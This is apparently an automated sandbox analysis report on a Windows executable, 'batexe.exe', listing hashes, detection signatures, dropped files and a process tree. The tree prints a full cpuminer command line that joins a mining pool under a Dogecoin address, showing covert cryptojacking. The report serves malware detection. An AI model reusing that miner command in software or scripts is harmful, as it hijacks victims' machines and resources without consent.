Analysis

  • max time kernel
    297s
  • max time network
    305s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    23/02/2024, 14:55

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:780
    • C:\Users\Admin\AppData\Local\Temp\1C4D.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\1C4D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1C4D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24AA.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3364

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\1C4D.tmp\b2e.exe

          Filesize

          3.3MB

          MD5

          bb401180e703bffdf30a9044b9e95c59

          SHA1

          3fe2dee9afb284baaa36d3082bbcc0bacf4bb46a

          SHA256

          81083354b6c390b4f54762c16dcd00b52d36e6990ddf79dd6fbbac3f90a73645

          SHA512

          771fc5efdb311a582775db25a1ed44e70c4a10d4ce12262d3d230f5017aebece57f7171ab9a306b7328bd15eb9b67d9b160f9a2d0178ffdfa881eedcd175653a

        • C:\Users\Admin\AppData\Local\Temp\1C4D.tmp\b2e.exe

          Filesize

          3.7MB

          MD5

          cba0da84bbedf49eebf5f0c8ccecc62e

          SHA1

          3aab8e3f3fde8c63060f8518b7de10247c7858e2

          SHA256

          155986d532eedf5c5622e37a0b42dab8c79a3525748272ced80a687a77245347

          SHA512

          88f2f9fc2dfcd5010e823c0d63db08bb6ac2bd864964a2dcf33affc1e2074f0bdd4a5b77e0a935f119a24f9650451473f5d18f1726ca36ebccd0a52eaa221f2f

        • C:\Users\Admin\AppData\Local\Temp\24AA.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          88KB

          MD5

          973362f6a43bae15621d133d38374774

          SHA1

          4ea31408978447fb0ac6d257e41a2132baf86237

          SHA256

          97fe1475c0d016921553c5009dc696b0d337909e57bc31c090d0b4825b3d246b

          SHA512

          e8f66560af42eb53d9c4ea53140377278eef433e142af91ed2da28caa2c734efece98fefc8f64316c2ce2ede180cf6d3eda8261f12db70e850143d6b864a8d1f

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          116KB

          MD5

          ca9a01181bffbdbab873c975d65df4ba

          SHA1

          13c01094544071bc52166e4e2d7cdc2ee4da54ae

          SHA256

          613f9845c6cdc6e50cfb5049740b14aef110cc3b1a07471d55fe1b8d673532f8

          SHA512

          dcd2df44add4f8bb0b531ae24f484746d8217b868064005d0aee762c322d4291980cd5a3eedb483e9603d605273523b9da6e63514ff24154beac553fddb79fd6

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          114KB

          MD5

          122abac570358455085fb5e647247aef

          SHA1

          6048a4c6b443ac68963576a7ac5e0187a24c33bb

          SHA256

          d07544b738e8f50435c995699e4c4bc5ad7b36804a9dce485e9745f7fa993b20

          SHA512

          327e391fc50b078fe96a67674033cbcdc5280a5003e91414e4017917beef869928117371731d79aebdb1e60a0fb36e2a3a57a35ef9555762655061106ce615cd

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          428KB

          MD5

          83e54b911cc14831d741529503333e1a

          SHA1

          040070cb25c9e5f2283de3047a327c0b1514187b

          SHA256

          4a4093ae6ce4a00eeb545ff72c9d9d97585d1731fb78f8604f68afe80c966da2

          SHA512

          b66f8d01e8ab778ad79d26484b95ec8c4aad944157bfacbd8c02e4abcce7083eaa3af69ad24d18dd3e9a9998580344ad62549fcfe00c7afbac87190c02c281d7

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          484KB

          MD5

          070d017f60953b7ed8620c14e64d7aa4

          SHA1

          9e4ce0249916f319bbcbd69ef7a9d0468027fa84

          SHA256

          adcad9da258eeea3b322196cf746b3b463fddc34a197139c9e4edde87bc3863c

          SHA512

          0f1c136677ae9ed1ea3990e78d619f0a3cf06c663c68238ec9dddac9e2f7389c9066e4c280ada23f0bb0f65bb87d025425bb3a975eb018c5dca4225cf562623f

        • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          385KB

          MD5

          9ccf184b4f876f6be8b6cbc80f19ff61

          SHA1

          444738313b3b45f673333d9be46cb393e4c7f508

          SHA256

          ef87d5fab283b76b71692704965d00a0f448be4f616ced19f554a460601e8907

          SHA512

          ad281ccdc988a67df70bea5e80fa1ec3121020e45a2fbc9836a9adda69c5cbe3c3e9e32a281036334fcd3da2c93d7fbbb87498bd906f7c18fb702c5dab3766cd

        • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          46KB

          MD5

          33d7cfc4697bfecfa456170110524bcf

          SHA1

          e8a65fafe5c70d8b97089c6f697dc14c4bfc7b38

          SHA256

          42ebc889be3d528ada41769c8874214b0f22b0666fed8c22dc870ffb2687c04b

          SHA512

          507e83cf75d28d93d6b23ffa00b11006b04f8b8d7092f20a1090c9294b3d6d7b0d3563d25941826ae615a91fbfc6561f67454474f052e95d5749a23730055a57

        • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          425KB

          MD5

          e1dac83330c891319ec4d93c0d147dbd

          SHA1

          02c94ad8ecb459905dd0c4e2ada3ad6fef81cae2

          SHA256

          6febe721fbcef3fb2d78a3fdf5fdd85b796c66a2ae9e0d53c42f6695cf69afc5

          SHA512

          3ab0c0615c0c24e161a368024fc1d3ac6f79235dd24be21a2375874c44766e3f2397c2c926d14a5087f29002e117b268586a88711b87f8c373868aa6ee38f69e

        • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          2KB

          MD5

          bc8eba61a7c945070a15ba917ab7342a

          SHA1

          e8e50b8f3f3c852d57bf88a5af2a558affdeaafd

          SHA256

          90ed5443af26bc736c034853015cf02e8020f3ac633bcc704171f5353c7cfdd4

          SHA512

          1af3bf79dfb447cca09e3e3d4aa91febb425dcba8085eda29b0f0b011418f22705f223d522cde7d0b22704e22ed83563326603fb57444fb64be3fe89f4ee3f0b

        • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          14KB

          MD5

          5c37dcf3e37dbc99177c5bcf977be61c

          SHA1

          44b8d5a15e30792b04ebbcd38b18779b66b5c07e

          SHA256

          29d05cc85bfba5e047fa07d67fd4832259ed2cd8e651e1d0719d6d1fe4ab1c5c

          SHA512

          7653829956b1e040b59d78d1b8d3efae81a65c906be1a5538d0ec6167af3fce5f0cfeaa506290d3ab23d192ff971a408c5b4a74736c83ba3ee9e6faa6b611d7d

        • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          14KB

          MD5

          57bc28e77ba7f02252d5d1c6ebeb7e33

          SHA1

          03d31966e052d14ff5f92d69ceacf8fc886e003c

          SHA256

          094b3dcb3308d87ee8c065d27dc1e0ee818c68d37312bdbc03af9c88f20914aa

          SHA512

          c11bdf493da9bac705cf4d31330ad4bfe2e93c5aa6c0812c47906645e441981880cd651ab20b53e0e9770053d8e3b5a7acdd515ec74f6e16a8c2cdccf49229d4

        • memory/780-6-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB

        • memory/3364-40-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-56-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-42-0x0000000070800000-0x00000000708BC000-memory.dmp

          Filesize

          752KB

        • memory/3364-41-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/3364-43-0x000000006E300000-0x000000006E398000-memory.dmp

          Filesize

          608KB

        • memory/3364-44-0x0000000001030000-0x00000000028E5000-memory.dmp

          Filesize

          24.7MB

        • memory/3364-45-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-101-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-51-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-96-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-61-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-71-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-76-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-86-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3364-91-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3880-5-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/3880-50-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB